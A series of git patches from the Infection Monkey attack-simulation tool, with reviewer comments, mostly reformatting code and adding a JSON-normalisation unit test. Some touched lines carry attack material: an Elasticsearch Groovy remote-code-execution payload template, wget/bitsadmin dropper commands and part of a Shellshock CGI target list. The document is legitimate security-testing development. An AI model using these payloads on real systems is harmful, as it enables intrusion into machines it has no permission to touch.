From 348a74361977a67ebb8eca62fb1a90923302ca82 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 10:28:40 +0200 Subject: [PATCH 22/53] Extracted api representations hooks to separate file, added UT, and fixed linter issue use `x not in y` instead of `not x in y`. --- monkey/monkey_island/cc/app.py | 32 +---------- .../cc/resources/representations.py | 31 +++++++++++ .../cc/resources/representations_test.py | 53 +++++++++++++++++++ 3 files changed, 86 insertions(+), 30 deletions(-) create mode 100644 monkey/monkey_island/cc/resources/representations.py create mode 100644 monkey/monkey_island/cc/resources/representations_test.py diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 38af31bde..8ab61c895 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -1,11 +1,8 @@ import os import uuid -from datetime import datetime -import bson import flask_restful -from bson.json_util import dumps -from flask import Flask, send_from_directory, make_response, Response +from flask import Flask, send_from_directory, Response from werkzeug.exceptions import NotFound from monkey_island.cc.auth import init_jwt @@ -24,6 +21,7 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report +from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed 
@@ -62,32 +60,6 @@ def serve_home(): return serve_static_file(HOME_FILE) -def normalize_obj(obj): - if '_id' in obj and not 'id' in obj: - obj['id'] = obj['_id'] - del obj['_id'] - - for key, value in list(obj.items()): - if isinstance(value, bson.objectid.ObjectId): - obj[key] = str(value) - if isinstance(value, datetime): - obj[key] = str(value) - if isinstance(value, dict): - obj[key] = normalize_obj(value) - if isinstance(value, list): - for i in range(0, len(value)): - if isinstance(value[i], dict): - value[i] = normalize_obj(value[i]) - return obj - - -def output_json(obj, code, headers=None): - obj = normalize_obj(obj) - resp = make_response(dumps(obj), code) - resp.headers.extend(headers or {}) - return resp - - def init_app_config(app, mongo_url): app.config['MONGO_URI'] = mongo_url app.config['SECRET_KEY'] = str(uuid.getnode()) diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/resources/representations.py new file mode 100644 index 000000000..cd804db50 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations.py @@ -0,0 +1,31 @@ +from datetime import datetime + +import bson +from bson.json_util import dumps +from flask import make_response + + +def normalize_obj(obj): + if ('_id' in obj) and ('id' not in obj): + obj['id'] = obj['_id'] + del obj['_id'] + + for key, value in list(obj.items()): + if isinstance(value, bson.objectid.ObjectId): + obj[key] = str(value) + if isinstance(value, datetime): + obj[key] = str(value) + if isinstance(value, dict): + obj[key] = normalize_obj(value) + if isinstance(value, list): + for i in range(0, len(value)): + if isinstance(value[i], dict): + value[i] = normalize_obj(value[i]) + return obj + + +def output_json(obj, code, headers=None): + obj = normalize_obj(obj) + resp = make_response(dumps(obj), code) + resp.headers.extend(headers or {}) + return resp 
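Review bot: `normalize_obj` rewrites the dict it receives (`obj['id'] = obj['_id']`, `del obj['_id']`, `obj[key] = ...`) and also returns it, so a caller that still uses the document gets it mutated; either copy first or document it, e.g. a docstring `"""Normalize *obj* in place for JSON output: rename ``_id`` to ``id`` and stringify ObjectId/datetime values, recursing into nested dicts and dicts inside lists; returns the same dict."""`. The recursion only descends into dict values and into dicts directly inside lists, so a list nested in a list or a list of ObjectIds is left untouched — intentional or not, a comment should say which. Both functions assume a dict: `'_id' in obj` works on a list but `obj.items()` raises `AttributeError`, so if any resource returns a list through `output_json` this representation breaks; a leading `if not isinstance(obj, dict): return obj` (or an explicit list branch) makes the contract visible. `for i in range(0, len(value))` reads better as `for i, item in enumerate(value)`.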
diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py new file mode 100644 index 000000000..714c70ed2 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -0,0 +1,53 @@ +from unittest import TestCase +from datetime import datetime +from .representations import normalize_obj + +import bson + + +class TestJsonRepresentations(TestCase): + def test_normalize_obj(self): + # empty + self.assertEqual({}, normalize_obj({})) + + # no special content + self.assertEqual( + {"a": "a"}, + normalize_obj({"a": "a"}) + ) + + # _id field -> id field + self.assertEqual( + {"id": 12345}, + normalize_obj({"_id": 12345}) + ) + + # obj id field -> str + obj_id_str = "123456789012345678901234" + self.assertEqual( + {"id": obj_id_str}, + normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + ) + + # datetime -> str + dt = datetime.now() + expected = {"a": str(dt)} + result = normalize_obj({"a": dt}) + self.assertEqual(expected, result) + + # dicts and lists + self.assertEqual({ + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, + normalize_obj({ + "a": [ + {"ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str)} + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)} + }) + ) From d6544c9e03f29338c2a97d7808204a9a0424bb11 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 12:59:32 +0200 Subject: [PATCH 23/53] Whitespace PEP8 fixes --- monkey/infection_monkey/exploit/__init__.py | 12 ++++++------ monkey/monkey_island/cc/services/__init__.py | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..e2b75a4dd 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py 
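Review bot: The test never checks whether `normalize_obj` leaves its argument alone or, as the implementation does, rewrites it in place, so the mutation contract is unpinned; keep a copy of the input dict before the call and assert on it either way. A non-dict top-level value such as `normalize_obj([{"_id": 1}])` and a list nested inside a list are also missing, and those are exactly the inputs where the current implementation raises or silently skips. `datetime.now()` is acceptable here because the expectation is derived from the same value, but a fixed `datetime(2019, 10, 28, 12, 0, 0)` would make a failure message reproducible.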
@@ -20,11 +20,11 @@ class HostExploiter(object, metaclass=ABCMeta):
 def __init__(self, host):
 self._config = infection_monkey.config.WormConfiguration
 self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
- 'started': '',
- 'finished': '',
- 'vulnerable_urls': [],
- 'vulnerable_ports': [],
- 'executed_cmds': []}
+ 'started': '',
+ 'finished': '',
+ 'vulnerable_urls': [],
+ 'vulnerable_ports': [],
+ 'executed_cmds': []}
 self.exploit_attempts = []
 self.host = host
@@ -43,7 +43,7 @@ class HostExploiter(object, metaclass=ABCMeta):
 def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
 self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
- 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
+ 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
 def exploit_host(self):
 self.pre_exploit()
diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py
index 142e51368..ee5b79ad0 100644
--- a/monkey/monkey_island/cc/services/__init__.py
+++ b/monkey/monkey_island/cc/services/__init__.py
@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
\ No newline at end of file
+__author__ = 'itay.mizeretz'
From cd3835a42e1bdf178f9f671fdc8e081eb7c1030f Mon Sep 17 00:00:00 2001
From: Shay Nehmad Date: Mon, 28 Oct 2019 16:14:52 +0200 Subject: [PATCH 24/53] Whitespace and imports fixes --- monkey/common/cloud/aws_instance.py | 4 +- monkey/common/cmd/aws/aws_cmd_runner.py | 2 +- monkey/common/data/zero_trust_consts.py | 30 +- monkey/common/utils/code_utils.py | 2 + .../infection_monkey/exploit/elasticgroovy.py | 6 +- monkey/infection_monkey/exploit/sambacry.py | 19 +- .../exploit/shellshock_resources.py | 808 +++++++++--------- monkey/infection_monkey/exploit/struts2.py | 7 +- .../exploit/tools/http_tools.py | 8 +- monkey/infection_monkey/exploit/wmiexec.py | 3 +- monkey/infection_monkey/main.py | 9 +- monkey/infection_monkey/model/__init__.py | 9 +- monkey/infection_monkey/monkeyfs.py | 1 - monkey/infection_monkey/network/firewall.py | 7 +- monkey/infection_monkey/network/httpfinger.py | 2 +- .../infection_monkey/network/ping_scanner.py | 15 +- monkey/infection_monkey/network/smbfinger.py | 10 +- .../infection_monkey/network/tcp_scanner.py | 3 +- .../system_info/SSH_info_collector.py | 2 +- monkey/infection_monkey/transport/base.py | 2 +- monkey/monkey_island/cc/models/test_monkey.py | 2 +- monkey/monkey_island/cc/resources/root.py | 8 +- .../cc/services/attack/attack_report.py | 5 +- monkey/monkey_island/cc/services/config.py | 15 +- .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 107 ++- .../cc/services/reporting/pth_report.py | 21 +- monkey/monkey_island/cc/utils.py | 11 +- 28 files changed, 593 insertions(+), 527 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index ac4fe633e..5178b0938 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py 
@@ -29,8 +29,8 @@ class AwsInstance(object):
 self.instance_id = urllib.request.urlopen( AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
 self.region = self._parse_region(
- urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().
- decode())
+ urllib.request.urlopen(
+ AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
 except (urllib.error.URLError, IOError) as e:
 logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py
index 9745d2c1d..459a42129 100644
--- a/monkey/common/cmd/aws/aws_cmd_runner.py
+++ b/monkey/common/cmd/aws/aws_cmd_runner.py
@@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
 Class for running commands on a remote AWS machine
 """
- def __init__(self, is_linux, instance_id, region = None):
+ def __init__(self, is_linux, instance_id, region=None):
 super(AwsCmdRunner, self).__init__(is_linux)
 self.instance_id = instance_id
 self.region = region
diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py
index 5ac5dd78d..ae27b1c35 100644
--- a/monkey/common/data/zero_trust_consts.py
+++ b/monkey/common/data/zero_trust_consts.py
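Review bot: The rewritten `urlopen` for `meta-data/placement/availability-zone` still carries no `timeout`, while the `instance-id` call two lines above passes `timeout=2`; on a non-AWS host where 169.254.169.254 simply drops the SYN, the `URLError`/`IOError` handler only fires once the OS socket timeout expires, so this one call can stall the enclosing method for minutes. Suggest `urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone', timeout=2).read().decode()`, matching the first request. The enclosing method (presumably `__init__`, given the `self.instance_id` assignment) begins and ends outside the hunk.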
@@ -68,7 +68,8 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
 TEST_EXPLANATION_KEY = "explanation"
 TESTS_MAP = {
 TEST_SEGMENTATION: {
- TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
+ TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
+ "running on, that belong to different network segments.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
 STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
 STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
@@ -78,7 +79,8 @@ TESTS_MAP = {
 POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
 },
 TEST_MALICIOUS_ACTIVITY_TIMELINE: {
- TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
+ TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
+ "exploitation.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
 STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
 },
@@ -89,8 +91,10 @@ TESTS_MAP = {
 TEST_ENDPOINT_SECURITY_EXISTS: {
 TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
- STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
+ STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
+ "software on endpoints.",
+ STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
+ "security concern. "
 },
 PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
 PILLARS_KEY: [DEVICES],
@@ -99,7 +103,8 @@ TESTS_MAP = {
 TEST_MACHINE_EXPLOITED: {
 TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
+ STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
+ "which endpoints were compromised.",
 STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
 },
 PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
@@ -109,7 +114,8 @@ TESTS_MAP = {
 TEST_SCHEDULED_EXECUTION: {
 TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
+ STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
+ "software.",
 STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
 },
 PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
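Review bot: The wrapped `STATUS_PASSED` text for `TEST_ENDPOINT_SECURITY_EXISTS` now ends in `"security concern. "`, a trailing space inside the literal that the original line did not have, so this "whitespace fix" changes the user-visible finding text and will break any exact-match comparison on it. Drop the space so the second fragment reads `"security concern."`. The `STATUS_FAILED` wrap in the same hunk and the two other hunks on this line are pure reflows and look correct.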
@@ -120,7 +126,8 @@ TESTS_MAP = {
 TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
 STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
+ STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
+ "that indicate attempts to access them. "
 },
 PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
 PILLARS_KEY: [DATA],
@@ -130,7 +137,8 @@ TESTS_MAP = {
 TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
 STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
+ STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
+ "attempts to access them. "
 },
 PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
 PILLARS_KEY: [DATA],
@@ -139,7 +147,8 @@ TESTS_MAP = {
 TEST_TUNNELING: {
 TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
+ STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
+ "restrict them. "
 },
 PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
 PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
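Review bot: All three hunks on this line introduce a trailing space inside the second string fragment that the original single-line literals did not carry: `"that indicate attempts to access them. "`, `"attempts to access them. "` and `"restrict them. "`. These are user-facing finding texts, so a reformat commit is silently altering report output and any test that compares the strings exactly. Trim each to end in `them."`; the trailing-space pattern suggests an editor auto-wrap, so the rest of the file is worth grepping for `. "` as well.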
@@ -148,7 +157,8 @@ TESTS_MAP = {
 TEST_COMMUNICATE_AS_NEW_USER: {
 TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
 FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
+ STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
+ "restrict them to MAC only.",
 STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
 },
 PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py
index d6d407706..b50e01fb0 100644
--- a/monkey/common/utils/code_utils.py
+++ b/monkey/common/utils/code_utils.py
@@ -1,10 +1,12 @@
 # abstract, static method decorator
+# noinspection PyPep8Naming
 class abstractstatic(staticmethod):
 __slots__ = ()
 def __init__(self, function):
 super(abstractstatic, self).__init__(function)
 function.__isabstractmethod__ = True
+ __isabstractmethod__ = True
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
index f1057f2dd..c8f897dd2 100644
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE):
 # attack URLs
 MONKEY_RESULT_FIELD = "monkey_result"
 GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
- JAVA_CMD = GENERIC_QUERY \
- % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+ JAVA_CMD = \
+ GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
 _TARGET_OS_TYPE = ['linux', 'windows']
 _EXPLOITED_SERVICE = 'Elastic search'
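Review bot: The class attribute `__isabstractmethod__ = True` added to `abstractstatic` is a semantic change hiding in a commit titled "Whitespace and imports fixes": it makes every `abstractstatic` abstract unconditionally, while `function.__isabstractmethod__ = True` in `__init__` already achieves that because `staticmethod` has forwarded `__isabstractmethod__` from the wrapped function since Python 3.3, so one of the two mechanisms is redundant. If the class-level flag is intentional (it cannot be lost if the wrapped callable is later swapped), keep it but say so in a docstring, e.g. `"""staticmethod that ABCMeta treats as abstract; on Python 3 this equals stacking @staticmethod over @abstractmethod."""`, and move the behavioural change to its own commit so the reflow commit stays reviewable as pure formatting.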
@@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
 exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
 exploit_config['dropper'] = True
 exploit_config['url_extensions'] = ['_search?pretty']
- exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
+ exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
 return exploit_config
 def get_open_service_ports(self, port_list, names):
diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py
index e48a21616..3c12ab843 100644
--- a/monkey/infection_monkey/exploit/sambacry.py
+++ b/monkey/infection_monkey/exploit/sambacry.py
@@ -230,13 +230,13 @@ class SambaCryExploiter(HostExploiter):
 elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
 is_vulnerable = True
 elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
- samba_version_parts[1] <= "13"):
+ samba_version_parts[1] <= "13"):
 is_vulnerable = True
 elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
- samba_version_parts[1] <= "9"):
+ samba_version_parts[1] <= "9"):
 is_vulnerable = True
 elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
- samba_version_parts[1] <= "3"):
+ samba_version_parts[1] <= "3"):
 is_vulnerable = True
 else:
 # If pattern doesn't match we can't tell what version it is. Better try
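Review bot: The three re-indented continuation lines in the sambacry hunk test `samba_version_parts[1]` a second time instead of the patch component `samba_version_parts[2]`, and they compare strings lexicographically, so `"4" <= "13"` and `"6" <= "3"` are always False while `"5" <= "9"` is always True: no 4.4.x or 4.6.x build ever matches its branch (they fall through to the `else` whose comment says to try anyway) and every 4.5.x is flagged vulnerable regardless of patch level. Each line should read like `int(samba_version_parts[2]) <= 13` (and `<= 9`, `<= 3` for the 4.5/4.6 branches), with a guard for non-numeric suffixes since the parts are parsed from banner text outside this hunk; the same string-vs-int issue affects the context line `samba_version_parts[1] <= "3"`, which accepts 4.10 and 4.11 as "<= 4.3". The enclosing method begins and ends outside the hunk.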
@@ -448,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
 return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
 else:
- return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
- shareMode=FILE_SHARE_READ,
- creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
- fileAttributes=0)
+ return SambaCryExploiter.create_smb(
+ smb_client,
+ treeId,
+ pathName,
+ desiredAccess=FILE_READ_DATA,
+ shareMode=FILE_SHARE_READ,
+ creationOptions=FILE_OPEN,
+ creationDisposition=FILE_NON_DIRECTORY_FILE,
+ fileAttributes=0)
diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py
index 10cfc75a6..46851dde1 100644
--- a/monkey/infection_monkey/exploit/shellshock_resources.py
+++ b/monkey/infection_monkey/exploit/shellshock_resources.py
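Review bot: In the reflowed `create_smb` call the keyword values look swapped: `creationOptions=FILE_OPEN` and `creationDisposition=FILE_NON_DIRECTORY_FILE`, whereas in impacket's constants `FILE_OPEN` is a creation *disposition* (0x1) and `FILE_NON_DIRECTORY_FILE` a create *option* (0x40), so as written the disposition would be an undefined value and the option bit would be `FILE_DIRECTORY_FILE`. `create_smb`'s signature is not in the hunk, so this is only certain if it forwards these straight to impacket's create; if it does, the two lines should be `creationOptions=FILE_NON_DIRECTORY_FILE,` and `creationDisposition=FILE_OPEN,`. The enclosing method begins outside the hunk; a reflow is the right moment to fix the ordering rather than carry it forward.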
@@ -1,406 +1,408 @@ # resource for shellshock attack # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list -CGI_FILES = (r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - 
r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - r'/cgi-bin/csv_db.cgi', - r'/cgi-bin/cvsblame.cgi', - r'/cgi-bin/cvslog.cgi', - r'/cgi-bin/cvsquery.cgi', - r'/cgi-bin/cvsqueryform.cgi', - r'/cgi-bin/day5datacopier.cgi', - r'/cgi-bin/day5datanotifier.cgi', - r'/cgi-bin/db_manager.cgi', - r'/cgi-bin/dbman/db.cgi', - r'/cgi-bin/dcforum.cgi', - r'/cgi-bin/dcshop.cgi', - r'/cgi-bin/dfire.cgi', - r'/cgi-bin/diagnose.cgi', - r'/cgi-bin/dig.cgi', - r'/cgi-bin/directorypro.cgi', - r'/cgi-bin/download.cgi', - r'/cgi-bin/e87_Ba79yo87.cgi', - r'/cgi-bin/emu/html/emumail.cgi', - r'/cgi-bin/emumail.cgi', - r'/cgi-bin/emumail/emumail.cgi', - r'/cgi-bin/enter.cgi', - r'/cgi-bin/environ.cgi', - r'/cgi-bin/ezadmin.cgi', - r'/cgi-bin/ezboard.cgi', - r'/cgi-bin/ezman.cgi', - r'/cgi-bin/ezshopper2/loadpage.cgi', - r'/cgi-bin/ezshopper3/loadpage.cgi', - r'/cgi-bin/ezshopper/loadpage.cgi', - r'/cgi-bin/ezshopper/search.cgi', - r'/cgi-bin/faqmanager.cgi', - r'/cgi-bin/FileSeek2.cgi', - r'/cgi-bin/FileSeek.cgi', - r'/cgi-bin/finger.cgi', - r'/cgi-bin/flexform.cgi', - r'/cgi-bin/fom.cgi', - r'/cgi-bin/fom/fom.cgi', - 
